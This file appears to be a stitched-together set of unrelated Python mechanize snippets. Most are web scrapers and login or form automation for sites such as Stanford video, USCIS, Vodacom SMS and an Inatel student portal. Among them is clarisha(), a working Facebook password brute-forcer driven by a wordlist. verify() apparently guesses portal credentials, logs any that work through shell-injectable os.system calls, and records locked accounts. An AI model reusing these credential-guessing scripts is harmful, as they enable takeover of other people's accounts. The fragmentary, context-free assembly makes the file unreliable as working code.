    br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9')]
    br.set_handle_robots(False)
    br.open('https://myvideosu.stanford.edu/oce/currentquarter.aspx')
    assert br.viewing_html()
    br.select_form(name='login')
    br['username'] = username
    br['password'] = getpass()
    # Open the course page for the title you're looking for
    print 'Logging in to myvideosu.stanford.edu...'
    response = br.submit()
    print 'Logged in, going to course link.'
    response = br.follow_link(text=courseName)
    # Build up a list of lectures
    print 'Loading video links.'
    links = []
    for link in br.links(text='WMP'):
        links.append(re.search(r"'(.*)'", link.url).group(1))
    # So we download the oldest ones first
    links.reverse()
    print 'Found %d links, getting video streams.' % len(links)
    videos = []
    for link in links:
        response = br.open(link)
        soup = BeautifulSoup(response.read())
        video = soup.find('object', id='WMPlayer')['data']
        video = re.sub('http', 'mms', video)
        video = video.replace(' ', '%20')  # remove spaces, they break urls
        output_name = re.search(r'[a-z]+[0-9]+[a-z]?/[0-9]+', video).group(0).replace('/', '_')
        output_wmv = output_name + '.wmv'
        print video
        videos.append((video, output_wmv))
    print 'Downloading %d video streams.' % (len(videos))
    for video in videos:
        download(video)
    print 'Done!'
def DownloadPage(url, headers=None):
    from mechanize import Browser, _http
    if headers is None:
        headers = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = headers
    page = br.open(url)
    return page.read()
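# A minimal usage sketch for DownloadPage(): fetch with the default headers,
# then with a custom User-agent. The URL is illustrative.
def demo_download_page():
    html = DownloadPage('http://example.com')
    html = DownloadPage('http://example.com', headers=[('User-agent', 'Firefox')])
    print len(html)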
def login():
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Chrome')]
    br.open("https://auth.tdameritrade.com")
    br.select_form(id="authform")
    br.form['su_username'] = "******"
    br.form['su_password'] = "******"
    no_url = br.submit()
    url = no_url.geturl()
    return url
def clarisha():
    try:
        br = Browser()  # Super hidden browser
        c = cookielib.LWPCookieJar()  # Variable for the cookie jar
        # Other options must be set
        br.set_handle_robots(False)
        br.set_handle_equiv(True)
        br.set_handle_referer(True)
        br.set_handle_redirect(True)
        br.set_cookiejar(c)  # Setting up cookies
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)  # Refresh
        headers = [("User-agent", 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1')]
        br.addheaders = headers  # Setting up the User-Agent
        user_name = raw_input('Enter UserName / Email >> ')
        wordlist = raw_input('Enter Passwords List >> ')
        try:
            open(wordlist, 'r')
        except IOError:
            octa()
            print(NGENTOT + 'No Such File or Directory >> %s' % (wordlist) + ENDC)
            print('\n')
            clarisha()
        octa()
        wordlist = open(wordlist, 'r')  # Opening the passwords list in read mode
        for password in wordlist:  # Taking each password on the list
            password = password.rstrip('\n')
            br.open('https://www.facebook.com/login.php')  # Open the Facebook login URL
            # Setting some options ('HTML options')
            br.select_form(nr=0)
            br.form['email'] = user_name
            br.form['pass'] = password
            br.submit()
            url = br.geturl()
            if url == 'https://www.facebook.com/login.php' or url == 'https://www.facebook.com/login.php?login_attempt=1&lwv=100':
                print(NGENTOT + 'Password Not Correct %s' % (password))
            elif url == 'https://www.facebook.com/' or url == 'https://www.facebook.com/?sk=welcome' or url == 'https://www.facebook.com/checkpoint/?next':
                print('\n')
                print('+------------------------------------------|')
                print(' | Password Found : %s' % (MUKIDI + password + ENDC) + '|')
                print('+------------------------------------------|')
                print('\n')
                exit(0)
    except KeyboardInterrupt:
        time.sleep(1)
        octa()
        print(NGENTOT + 'Exiting =)')
        print('\n')
        sys.exit(0)
def download():
    b = Browser()
    b.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    r1 = b.open(URL)
    b.select_form(nr=0)
    b.set_all_readonly(False)
    b["__EVENTTARGET"] = "ctl00$CPH1$dgMain"
    b["__EVENTARGUMENT"] = "Page$2"
    b.find_control("ctl00$CPH1$tbSearch").disabled = True
    r2 = b.submit()
    return [r1, r2]
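# The download() above drives an ASP.NET pager: __EVENTTARGET names the control
# that raises the postback and __EVENTARGUMENT selects the page. A hedged,
# generalized sketch of that pattern; the control names are illustrative and
# 'br' is any mechanize.Browser with the page already open.
def fetch_aspnet_page(br, target, page_number):
    br.select_form(nr=0)
    br.set_all_readonly(False)  # allow writing to __EVENTTARGET/__EVENTARGUMENT
    br["__EVENTTARGET"] = target  # e.g. "ctl00$CPH1$dgMain"
    br["__EVENTARGUMENT"] = "Page$%d" % page_number
    # Disable submit buttons so mechanize posts only the simulated event
    for control in br.form.controls:
        if control.type == 'submit':
            control.disabled = True
    return br.submit()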
def Top10Followers():
    ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]
    br.open('http://socialblade.com/instagram/top/10/followers')
    soup = BeautifulSoup(br.response().read())
    table = soup.find('div', {'class': 'content-module-wide'}).contents
    top10 = []
    for i in xrange(1, 120, 2):
        top10.append(table[i].text.replace(',', '.'))
    # six fields per account; split the flat list into rows
    rows = [top10[x:x + 6] for x in xrange(0, len(top10), 6)]
    top10return = []
    for n in range(0, 10):
        top10return.append('%s | %s | %s | %s | %s\n' % (rows[n][0], rows[n][2], rows[n][3], rows[n][4], rows[n][5]))
    return ''.join(top10return)
def init_browser():
    browser = Browser()
    browser.addheaders = [
        ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
        ('User-agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')  # We're Firefox! :P
    ]
    # browser.set_handle_gzip(True)  # Currently experimental in mechanize
    browser.set_handle_redirect(True)
    browser.set_handle_refresh(False)
    browser.set_handle_robots(True)
    browser.set_handled_schemes(['http', 'https'])
    browser.set_proxies({})
    return browser
def redirect(self):
    try:
        if self.agent:
            br = Browser()
            UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
            header = {"User-Agent": UserAgent}
            br.set_handle_robots(False)
            br.addheaders = [("User-agent", "Firefox")]
            remote_url = br.open(self.target).geturl()
        else:
            remote_url = u.urlopen(self.target).geturl()
        return (remote_url)
    except Exception as e:
        print(e)
def get_browser(browser=None):
    """
    Create a new browser if none is present.

    Returns:
        (:class:`mechanize.Browser`)
    """
    if not browser:
        browser = Browser()
        browser.set_handle_robots(False)
        browser.addheaders = [('User-agent',
                               ('Mozilla/5.0 (X11; U; Linux i686; en-US; '
                                'rv:1.9.0.1) Gecko/2008071615 '
                                'Fedora/3.0.1-1.fc9 Firefox/3.0.1'))]
    return browser
def HTTPcode(self):
    try:
        if self.agent:
            br = Browser()
            UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
            header = {"User-Agent": UserAgent}
            br.set_handle_robots(False)
            br.addheaders = [("User-agent", "Firefox")]
            resp = br.open(self.target).code
        else:
            resp = u.urlopen(self.target).getcode()
        return (resp)
    except (u.HTTPError, u.URLError):
        return (404)
def getdata(url):
    br = Browser()
    # Ignore robots.txt
    br.set_handle_robots(False)
    # Sites often demand a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]
    # Retrieve the page, saving the response
    br.open(url)
    res = br.response()
    data = res.get_data()
    return data
def download(url):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open("https://translate.google.com/translate?hl=&sl=&tl=&u=" + url + "&anno=2")
    for link in br.links():
        if "https://translate.googleusercontent.com/translate_p?" in link.absolute_url:
            br.follow_link(link)
            break
    response = BeautifulSoup(br.response().read().decode(), "html.parser").find("pre").get_text()
    return response
def setupUSCIS(immInfo):
    br = Browser()
    br.addheaders = [('User-Agent', "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36")]
    # Opens to the sign-up page
    br.open('https://egov.uscis.gov/casestatus/disclaimer.do')
    br.follow_link(text="ACCEPT")
    # Clicks next (nothing on page 1)
    br.select_form("signUpForm")
    br.submit()
    # Fills in the signup sheet
    br.select_form("signUpForm")
    br.form["userSubType"] = ["1"]
    br.form["firstName"] = immInfo["firstName"]
    br.form["lastName"] = immInfo["lastName"]
    br.form["country"] = immInfo["country"]
    br.form["city"] = immInfo["city"]
    br.form["state"] = immInfo["state"]
    br.form["zipCode"] = immInfo["zipCode"]
    br.form["email"] = immInfo["email"]
    br.form["phone"] = immInfo["phone"]
    br.form["language"] = immInfo["language"]
    br.submit()
    # Fills in the username and password
    br.select_form("signUpForm")
    br.form["userId"] = immInfo["username"]
    br.form["password"] = immInfo["password"]
    br.form["confirmPassword"] = immInfo["password"]
    # Counts each question answered
    counter = 1
    for i in range(1, 13):
        if counter == 5:
            break
        # Checks if the answer exists
        if immInfo["answer" + str(i)]:
            br.form["question" + str(counter)] = str(i)
            br.form["answer" + str(counter)] = immInfo["answer" + str(i)]
            counter += 1
    # Submits the form
    br.submit()
def verify(th, num, curso, matr, senha):
    URL = "https://siteseguro.inatel.br/PortalAcademico/WebLogin.aspx"
    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)
    br.select_form('aspnetForm')
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) '
                                    'Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]
    response = br.submit(name='ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$LoginButton')
    dados = response.read()
    soup = BeautifulSoup(dados, 'html.parser')
    try:
        label_erro = soup.find(id='ctl00_Corpo_lblErro')
        label_login = soup.find(id='ctl00_LoginName1')
        if label_erro is not None:
            label_erro_str = label_erro.get_text().encode('ascii', 'ignore')
        if label_login is not None:
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> senha.log" % (curso, matr, senha))
            return True
        elif label_erro_str == ('Sua senha est bloqueada. Entre '
                                'em contato com a CRA para providenciar '
                                'o desbloqueio ou aguarde 30 minutos.'):
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> bloqueado.log" % (curso, matr, senha))
            return False
        else:
            print('Thread: %i ==> Curso: %s; Matr: %s; Senha: %s; NOK'
                  % (num, curso, matr, senha))
    except:
        print("Library error, check the dependencies!")
def process_irc(self, ident, _from, to, msg):
    """ Handle IRC messages """
    # Process URLs posted to the channel
    for url in self.xurls(msg):
        if re.match("^(http|https)://(www\.|)youtube.com.*", url):
            self.process_irc_youtube(url)
            continue
        try:
            br = Browser()
            br.set_handle_robots(False)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0')]
            br.open(url)
            self.irc.privmsg(self.channel, "Title: " + br.title())
        except Exception, e:
            self.debug.error("process_irc: Exception '%s'." % e)
def send_sms_voda(user, pword, number, txt):
    if user[0] == '0':
        user = '******' + user[1:]
    br = Browser()
    # Set user-agent
    headers = dict(br.addheaders)
    headers["User-agent"] = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008052912 Firefox/3.0"
    br.addheaders = headers.items()
    # Login
    br.open(LOGIN_URL)
    br.select_form(nr=1)
    br["logon"] = user
    br["password"] = pword
    print "Logging in..."
    br.submit()
    # Send SMS
    br.open(SMS_URL)
    br.select_form(nr=1)
    br["destinationNumber"] = number
    br["messageBody"] = txt
    # Thanks for using shitty code Vodacom. We have to extract the submission
    # url from the javascript code in the document.
    page = br.response().read()
    x = page.find('function validateFormInput()')
    x = page.find('var actionURL', x)
    actionURLStart = page.find("'", x) + 1
    actionURLEnd = page.find("'", actionURLStart)
    actionURL = page[actionURLStart:actionURLEnd]
    br.form.action = 'https://www.vodacom.co.za' + actionURL
    print "Sending message..."
    br.submit()
    response = br.response().read()
    if 'Your SMS has been delivered successfully.' in response:
        print "Message sent"
    else:
        print >> stderr, "Message sending failed. See /tmp/vodacom.html to see the response."
        file('/tmp/vodacom.html', 'w').write(response)
        exit(1)
def doLogin():
    global br
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_refresh(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://www.qruiser.com")
    #response1 = br.follow_link(link)
    i = 0
    for form in br.forms():
        i += 1
        #print form
        if i > 1:
            br.form = form
    br.form['loginname'] = 'maxberggren'
    br.form['loginpassword'] = '******'
    response = br.submit()
def get_horario(matr, senha, curso):
    URL = "https://siteseguro.inatel.br/PortalAcademico/Academico/Sra/WebQuadroAulas.aspx"
    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)
    br.select_form('aspnetForm')
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]
    response = br.submit(name='ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$LoginButton')
    dados = response.read()
    soup = BeautifulSoup(dados, 'html.parser')
    soup2 = soup.find(id='ctl00_Corpo_UCQuadroHorarios1_GridDados')
    all_td = soup2.find_all("td")
    aux = []
    for var in all_td:
        aux.append(var.get_text())
    lista_horario = []
    # each table row spans 19 cells; the schedule cells sit at these offsets
    for x in range(0, 15):
        for offset in (2, 5, 8, 11, 14, 17):
            lista_horario.append(aux[offset + (19 * x)])
    return lista_horario
def submit_form(response):
    browser = Browser()
    browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    browser.open(response.url)
    browser.select_form(nr=0)
    browser.form['username'] = USERNAME
    browser.form['password'] = PASSWORD
    browser.submit()
    url_principal = browser.geturl()
    browser.open(url_principal)
    browser.select_form(nr=0)
    print browser.response().read()
    browser.submit()
    return browser
def crawler():
    global url
    global total_news
    agent = Browser()
    agent.addheaders = [('User-agent', 'Firefox')]
    agent.set_handle_robots(True)
    agent.set_handle_refresh(False)
    agent_data = agent.open(url)
    soup = BS(agent_data.read(), "lxml")
    for row in soup.find_all('div', attrs={"class": "list-view--item vertical-list-item"}):
        link = row.find('a')['href']
        date = row.find('span', attrs={"class": "timestamp"}).text
        text = row.find('p', attrs={"class": "heading text-underline"}).text
        if {"date": date, "news": text, "link": link} not in total_news:
            total_news.append({"date": date, "news": text, "link": link})
def SHOW(url):
    from mechanize import Browser
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    response = br.open(url)
    data = response.read()
    response.close()
    cr = 0
    match = re.compile('<span class="bold">(.+?)</span>.*\n.*src="(.+?)"').findall(data)
    #matchi = re.compile('<link rel="image_src" href="(.+?)"').findall(data)
    for server, link in match:
        #for thumbnail in match:
        title = 'Server-' + server + name
        addLink2(name, link, 10, iconimage, title)
        cr = cr + 1